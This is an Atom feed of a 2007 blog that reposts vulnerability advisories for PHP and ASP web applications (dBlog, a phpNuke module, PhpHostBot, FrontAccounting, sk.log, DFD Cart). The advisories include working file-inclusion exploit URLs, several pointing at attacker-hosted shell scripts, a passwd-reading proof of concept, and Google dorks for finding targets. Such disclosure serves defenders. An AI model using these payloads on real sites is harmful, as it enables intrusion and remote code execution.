<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6631579783731918290</id><updated>2011-11-27T17:44:23.031-08:00</updated><category term='web security'/><title type='text'>Internet Security, Bugtraq list, Web Security</title><subtitle type='html'>This blog used to collect some internet security (especially for web security) from other web
Enjoy stay here</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>8</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6631579783731918290.post-6161339787877152759</id><published>2007-09-26T20:59:00.001-07:00</published><updated>2007-09-26T20:59:43.370-07:00</updated><title type='text'>dBlog CMS Open Source database retrieval</title><content type='html'>&lt;span class="content"&gt;Author: Janek Vind "waraxe"&lt;br /&gt;Date: 19. September 2007&lt;br /&gt;Location: Estonia, Tartu&lt;br /&gt;Web: http://www.waraxe.us/advisory-52.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Target software description:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;http://www.dblog.it/sito/default.asp&lt;br /&gt;&lt;br /&gt;DBlog CMS is a open source Content Management System for IIS/ASP platform.&lt;br /&gt;Some days ago dBlog 2.0 hit the goal of the 110.000 platform downloads,&lt;br /&gt;over 100.000 of them regarding the lastest version.&lt;br /&gt;&lt;br /&gt;GoogleDork: inurl:"articolo.asp" "powered by dblog"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vulnerabilities:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;DBlog stores all the data in JET database file with default name "dblog.mdb".&lt;br /&gt;This database file is accessible from web as:&lt;br /&gt;&lt;br /&gt;http://www.example.com/mdb-database/dblog.mdb&lt;br /&gt;&lt;br /&gt;By fetching database anyone can obtain admin password sha hashes and then try to&lt;br /&gt;crack them and gain admin privileges.&lt;br /&gt;There are some mitigating factors though:&lt;br /&gt;&lt;br /&gt;1. IIS webserver can refuse ".mdb" file download&lt;br /&gt;2. database file or directory can be renamed to something else&lt;br /&gt;&lt;br /&gt;Quick look @ real world sites shows, that ~ 20% of them are exploitable.&lt;br /&gt;Considering large number of DBlog-based websites, this is serious problem IMHO.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;How to fix:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;IIS directory restrictions, renaming directory and database file.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Greetings:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;Greets to pabloski, ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb&lt;br /&gt;and all other people who know me!&lt;br /&gt;Greetings to Raido Kerna.&lt;br /&gt;Tervitusi Torufoorumi rahvale!&lt;br /&gt;&lt;br /&gt;Contact:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;come2waraxe@yahoo.com&lt;br /&gt;Janek Vind "waraxe"&lt;br /&gt;&lt;br /&gt;Homepage: http://www.waraxe.us/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Shameless advertise:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;User Manual Database - http://user-manuals.waraxe.us/&lt;br /&gt;Old Books Online - http://www.oldreadings.com/&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6631579783731918290-6161339787877152759?l=bugtraq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/6161339787877152759/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6631579783731918290&amp;postID=6161339787877152759' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/6161339787877152759'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/6161339787877152759'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/2007/09/dblog-cms-open-source-database.html' title='dBlog CMS Open Source database retrieval'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6631579783731918290.post-1901364502909735334</id><published>2007-09-26T20:57:00.000-07:00</published><updated>2007-09-26T20:58:24.075-07:00</updated><title type='text'>Local File Inclusion in Dance Music module for phpNuke</title><content type='html'>&lt;span class="content"&gt;Author: Janek Vind "waraxe"&lt;br /&gt;Date: 25. September 2007&lt;br /&gt;Location: Estonia, Tartu&lt;br /&gt;Web: http://www.waraxe.us/advisory-54.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Target software description:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;http://www.bestdownload.biz/modules.php?name=Downloads&amp;amp;d_op=viewdownloaddetails&lt;br /&gt;&amp;amp;lid=251&amp;amp;title=Dance%20Music%20for%20PHP-Nuke&lt;br /&gt;&lt;br /&gt;Dance Music for PHP-Nuke&lt;br /&gt;by MultiMedia http://www.multimedia.com.ro&lt;br /&gt;and Nicolae Sfetcu http://www.sfetcu.com&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Vulnerabilities: Local File Inclusion in "index.php"&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;Let's take a peek at source code of "index.php":&lt;br /&gt;&lt;br /&gt;------------&gt;[source code]&lt;------------&lt;br /&gt;&lt;br /&gt;include("header.php");&lt;br /&gt;...&lt;br /&gt;$ACCEPT_FILE['Acid_house.html'] = 'Acid_house.html';&lt;br /&gt;$ACCEPT_FILE['Alternative_dance.html'] = 'Alternative_dance.html';&lt;br /&gt;$ACCEPT_FILE['Ambient_house.html'] = 'Ambient_house.html';&lt;br /&gt;...&lt;br /&gt;$page = $_GET['page'];&lt;br /&gt;...&lt;br /&gt;$pagename = $ACCEPT_FILE[$page];&lt;br /&gt;if (!isSet($pagename)) $pagename = "index.html";&lt;br /&gt;include("modules/Dance_Music-MM/$pagename");&lt;br /&gt;&lt;br /&gt;------------&gt;[/source code]&lt;-----------&lt;br /&gt;&lt;br /&gt;As we can see, "$ACCEPT_FILE" array is uninitialized, so we can insert there&lt;br /&gt;arbitrary values from $_GET/$_POST/$_COOKIES parameters, if "register_globals"&lt;br /&gt;is active.&lt;br /&gt;&lt;br /&gt;Proof-of-concept test:&lt;br /&gt;&lt;br /&gt;http://victim.com/modules.php?name=Dance_Music-MM&amp;amp;page=1&lt;br /&gt;&amp;amp;ACCEPT_FILE[1]=../../../../../../../../../etc/passwd&lt;br /&gt;&lt;br /&gt;Warning: main() [function.main]: open_basedir restriction in effect.&lt;br /&gt; File(./modules/Dance_Music-MM/../../../../../../../../../../../../etc/passwd&lt;br /&gt;) is not within the allowed path(s): (/home/www/web32/)&lt;br /&gt;in /home/www/web32/html/portal/modules/Dance_Music-MM/index.php on line 154&lt;br /&gt;&lt;br /&gt;So local file inclusion exists, but safe mode can make exploiting harder.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;//-----&gt; See ya soon and have a nice day ;) &lt;-----//&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Greetings:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;Greets to ToXiC, LINUX, y3dips, Sm0ke, Heintz, slimjim100, Chb&lt;br /&gt;and anyone else who know me!&lt;br /&gt;Greetings to Raido Kerna.&lt;br /&gt;Tervitusi Torufoorumi rahvale!&lt;br /&gt;&lt;br /&gt;Contact:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;come2waraxe@yahoo.com&lt;br /&gt;Janek Vind "waraxe"&lt;br /&gt;&lt;br /&gt;Homepage: http://www.waraxe.us/&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6631579783731918290-1901364502909735334?l=bugtraq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/1901364502909735334/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6631579783731918290&amp;postID=1901364502909735334' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/1901364502909735334'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/1901364502909735334'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/2007/09/local-file-inclusion-in-dance-music.html' title='Local File Inclusion in Dance Music module for phpNuke'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6631579783731918290.post-4388450453610408603</id><published>2007-09-26T20:27:00.000-07:00</published><updated>2007-09-26T20:28:24.122-07:00</updated><title type='text'>PhpHostBot &lt;= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability</title><content type='html'>&lt;pre&gt;____________________   ___ ___ ________&lt;br /&gt;\_   _____/\_   ___ \ /   |   \\_____  \ &lt;br /&gt;|    __)_ /    \  \//    ~    \/   |   \&lt;br /&gt;|        \\     \___\    Y    /    |    \&lt;br /&gt;/_______  / \______  /\___|_  /\_______  /&lt;br /&gt;       \/         \/       \/         \/&lt;br /&gt;&lt;br /&gt;                                       .OR.ID&lt;br /&gt;ECHO_ADV_83$2007&lt;br /&gt;&lt;br /&gt;-----------------------------------------------------------------------------------------&lt;br /&gt;[ECHO_ADV_83$2007] PhpHostBot &lt;= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability&lt;br /&gt;-----------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Author         : M.Hasran Addahroni&lt;br /&gt;Date           : August, 4 th 2007&lt;br /&gt;Location       : Australia, Sydney&lt;br /&gt;Web            : http://advisories.echo.or.id/adv/adv83-K-159-2007.txt&lt;br /&gt;Critical Lvl   : Dangerous&lt;br /&gt;Impact        : System access&lt;br /&gt;Where        : From Remote&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Affected software description:&lt;br /&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;Application   : PhpHostBot &lt;br /&gt;version       : &lt;= 1.06&lt;br /&gt;Vendor        : http://www.idevspot.com/PhpHostBot.php&lt;br /&gt;Description :&lt;br /&gt;&lt;br /&gt;PhpHostBot is a webware PHP application which integrates with the popular Cpanel(WHM) web hosting control panel.&lt;br /&gt;PhpHostBot supports Paypal subscriptions, free web hosting, Subdomain and Reseller account setup&lt;br /&gt;and supports both dedicated server and Reseller web hosting companies&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Vulnerability:&lt;br /&gt;~~~~~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files.&lt;br /&gt;This can be exploited to include arbitrary files from local or external resources.&lt;br /&gt;Successful exploitation requires that "register_globals" is enabled.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Poc/Exploit:&lt;br /&gt;~~~~~~~~~~&lt;br /&gt;&lt;br /&gt;http://www.target.com/[PhpHostBot-path]/order/login.php?svr_rootscript=http://attacker.com/evil?&lt;br /&gt;&lt;br /&gt;Google Dork:&lt;br /&gt;~~~~~~~~~~~&lt;br /&gt;        "order?page=plan_show"&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;~~~~~~~&lt;br /&gt;&lt;br /&gt;- Edit the source code to ensure that input is properly verified.&lt;br /&gt;- Turn off register_globals&lt;br /&gt;- use the latest version&lt;br /&gt;&lt;br /&gt;Timeline:&lt;br /&gt;~~~~~~~~~&lt;br /&gt;&lt;br /&gt;- 27 -07 - 2007 bug found&lt;br /&gt;- 4 - 08 - 2007 vendor contacted&lt;br /&gt;- 7 - 08 - 2007 advisory released&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;Shoutz:&lt;br /&gt;~~~~~&lt;br /&gt;~ ping - my dearest wife, zautha my little son, for all the luv the tears n the breath&lt;br /&gt;~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)&lt;br /&gt;~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw&lt;br /&gt;~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16&lt;br /&gt;~ newbie_hacker@yahoogroups.com&lt;br /&gt;~ #aikmel #e-c-h-o @irc.dal.net&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;Contact:&lt;br /&gt;~~~~~~&lt;br /&gt;&lt;br /&gt;    K-159 || echo|staff || eufrato[at]gmail[dot]com&lt;br /&gt;    Homepage: http://k-159.echo.or.id/&lt;br /&gt;&lt;br /&gt;-------------------------------- [ EOF ] ----------------------------------&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6631579783731918290-4388450453610408603?l=bugtraq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/4388450453610408603/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6631579783731918290&amp;postID=4388450453610408603' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/4388450453610408603'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/4388450453610408603'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/2007/09/phphostbot-106-svrrootscript-remote.html' title='PhpHostBot &lt;= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6631579783731918290.post-7381070203869856216</id><published>2007-09-26T20:20:00.000-07:00</published><updated>2007-09-26T20:25:35.982-07:00</updated><title type='text'>FrontAccounting version 1.13  &lt;=  Remote File Inclusion Vulnerability</title><content type='html'>&lt;pre&gt;#&lt;br /&gt;#Dork:"FrontAccounting"&lt;br /&gt;#&lt;br /&gt;#Vuln Code&lt;br /&gt;##############################################################################################&lt;br /&gt;#&lt;br /&gt;#ERROR1:accsess/login.php&lt;br /&gt;#&lt;br /&gt;#   include_once($path_to_root . "/includes/ui/ui_view.inc"); &lt;&lt;&lt; RFI&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#BUG1:login.php?path_to_root&lt;br /&gt;#&lt;br /&gt;#Example1:http://site.com/path/accsess/login.php?path_to_root=[[Sh3LLScript]]&lt;br /&gt;#&lt;br /&gt;##############################################################################################&lt;br /&gt;##############################################################################################&lt;br /&gt;#&lt;br /&gt;#ERROR2:includes/lang/language.php&lt;br /&gt;#&lt;br /&gt;#   include_once($path_to_root . "/lang/installed_languages.inc");&lt;br /&gt;#   include_once($path_to_root . "/includes/lang/gettext.php"); &lt;&lt;&lt; RFI&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#BUG2:includes/lang/language.php?path_to_root&lt;br /&gt;#&lt;br /&gt;#Example2:http://site.com/path/includes/lang/language.php?path_to_root=[[Sh3LLScript]]&lt;br /&gt;#&lt;br /&gt;##############################################################################################&lt;br /&gt;#&lt;br /&gt;#http://sourceforge.net/projects/frontaccounting/&lt;br /&gt;#&lt;br /&gt;##############################################################################################&lt;br /&gt;#&lt;br /&gt;#&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; coded by K3ZZAP66345&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;br /&gt;#&lt;br /&gt;#"Eli mouse tutan herkes kendini haykır zannedio."----------------"Eli opulcek cok insan var."&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..##############################&lt;br /&gt;##############################################################################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2007-09-26]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6631579783731918290-7381070203869856216?l=bugtraq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/7381070203869856216/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6631579783731918290&amp;postID=7381070203869856216' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/7381070203869856216'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/7381070203869856216'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/2007/09/frontaccounting-version-113-remote-file.html' title='FrontAccounting version 1.13  &lt;=  Remote File Inclusion Vulnerability'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6631579783731918290.post-7386510282985002271</id><published>2007-09-25T03:32:00.000-07:00</published><updated>2007-09-25T03:35:14.128-07:00</updated><title type='text'>Nuke Mobile Entartainment Local File Inclusion</title><content type='html'>-----------------------------------------------&lt;br /&gt;# Found by Seph1roth&lt;br /&gt;# http://blackroots.it&lt;br /&gt;-----------------------------------------------&lt;br /&gt;&lt;br /&gt;# Vulnerable script download&lt;br /&gt;http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip&lt;br /&gt;&lt;br /&gt;# Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]&lt;br /&gt;&lt;br /&gt;# This is the vulnerable code :&lt;br /&gt;&lt;br /&gt;# include 'modules/'.$module_name.'compatibility/data/marque.data.php';&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6631579783731918290-7386510282985002271?l=bugtraq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/7386510282985002271/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6631579783731918290&amp;postID=7386510282985002271' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/7386510282985002271'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/7386510282985002271'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/2007/09/nuke-mobile-entartainment-local-file.html' title='Nuke Mobile Entartainment Local File Inclusion'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6631579783731918290.post-4680491181465767545</id><published>2007-09-25T03:28:00.000-07:00</published><updated>2007-09-25T03:32:34.131-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='web security'/><title type='text'>sk.log v0.5.3 Remote File Inclusion</title><content type='html'>++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;+ sk.log v0.5.3 Remote File Inclusion&lt;br /&gt;+ High Risk&lt;br /&gt;+ Found by Seph1roth&lt;br /&gt;+ &lt;a href="http://blackroots.it/"&gt;http://blackroots.it&lt;/a&gt;&lt;br /&gt;++++++++++++++++++++++++++++++++++++++++++++++++++&lt;br /&gt;&lt;p&gt;+ Vulnerable Code&lt;br /&gt;&lt;/p&gt;&lt;p&gt;+ log.inc.php&lt;br /&gt;+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );&lt;br /&gt;&lt;/p&gt;&lt;p&gt;+ Exploit&lt;br /&gt;/php-inc/log.inc.php?SKIN_URL=[Shell]&lt;br /&gt;&lt;/p&gt;+ Script Download&lt;br /&gt;&lt;a href="http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip"&gt;http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6631579783731918290-4680491181465767545?l=bugtraq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/4680491181465767545/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6631579783731918290&amp;postID=4680491181465767545' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/4680491181465767545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/4680491181465767545'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/2007/09/sklog-v053-remote-file-inclusion.html' title='sk.log v0.5.3 Remote File Inclusion'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6631579783731918290.post-6829380336471843783</id><published>2007-09-23T23:32:00.000-07:00</published><updated>2007-09-23T23:41:22.175-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='web security'/><title type='text'>DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities</title><content type='html'>Vulnerability Type: Remote File Inclusion&lt;br /&gt;Vulnerable file: /dfd_cart/app.lib/product.control/core.php/product.control.config.php&lt;br /&gt;Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://localhost/shell.txt?&lt;br /&gt;Method: get&lt;br /&gt;Register_globals: On&lt;br /&gt;Vulnerable variable: set_depth&lt;br /&gt;Line number: 32&lt;br /&gt;Lines:&lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;&lt;br /&gt;require ("".$set_depth."app.lib/product.control/core.php/functions.php");&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;&lt;br /&gt;Vulnerability Type: Remote File Inclusion&lt;br /&gt;Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php&lt;br /&gt;Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://localhost/shell.txt?&lt;br /&gt;Method: get&lt;br /&gt;Register_globals: On&lt;br /&gt;Vulnerable variable: set_depth&lt;br /&gt;Line number: 179&lt;br /&gt;Lines:&lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;$category_html = 'form_select';&lt;br /&gt;require ("".$set_depth."app.lib/product.control/core.php/category.list.php");&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;&lt;br /&gt;Vulnerability Type: Remote File Inclusion&lt;br /&gt;Vulnerable file: /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php&lt;br /&gt;Exploit URL: http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://localhost/shell.txt?&lt;br /&gt;Method: get&lt;br /&gt;Register_globals: On&lt;br /&gt;Vulnerable variable: set_depth&lt;br /&gt;Line number: 154&lt;br /&gt;Lines:&lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;$category_html = 'form_select';&lt;br /&gt;require ("".$set_depth."app.lib/product.control/core.php/category.list.php");&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;Multiple Remote Vulnerabilities&lt;br /&gt;&lt;br /&gt;GrEeTs To sHaDoW sEcUrItY TeAm &amp;amp; str0ke&lt;br /&gt;&lt;br /&gt;FoUnD By BiNgZa&lt;br /&gt;&lt;br /&gt;DoRk: :(&lt;br /&gt;&lt;br /&gt;shadowcrew@hotmail.co.uk&lt;br /&gt;&lt;br /&gt;http://shadow.wizhoo.com/&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2007-09-24]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Comment: PHP injection still booming.. beware with your PHP script&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6631579783731918290-6829380336471843783?l=bugtraq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/6829380336471843783/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6631579783731918290&amp;postID=6829380336471843783' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/6829380336471843783'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/6829380336471843783'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/2007/09/dfd-cart-11-multiple-remote-file.html' title='DFD Cart 1.1 Multiple Remote File Inclusion Vulnerabilities'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6631579783731918290.post-2071080900832535097</id><published>2007-09-23T23:29:00.000-07:00</published><updated>2007-09-23T23:32:11.197-07:00</updated><title type='text'>Introduction</title><content type='html'>Hi all, this blog used to collect about internet security from other site. Enjoy here and you dont need to open many page. :D&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6631579783731918290-2071080900832535097?l=bugtraq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bugtraq.blogspot.com/feeds/2071080900832535097/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6631579783731918290&amp;postID=2071080900832535097' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/2071080900832535097'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6631579783731918290/posts/default/2071080900832535097'/><link rel='alternate' type='text/html' href='http://bugtraq.blogspot.com/2007/09/introduction.html' title='Introduction'/><author><name>.</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
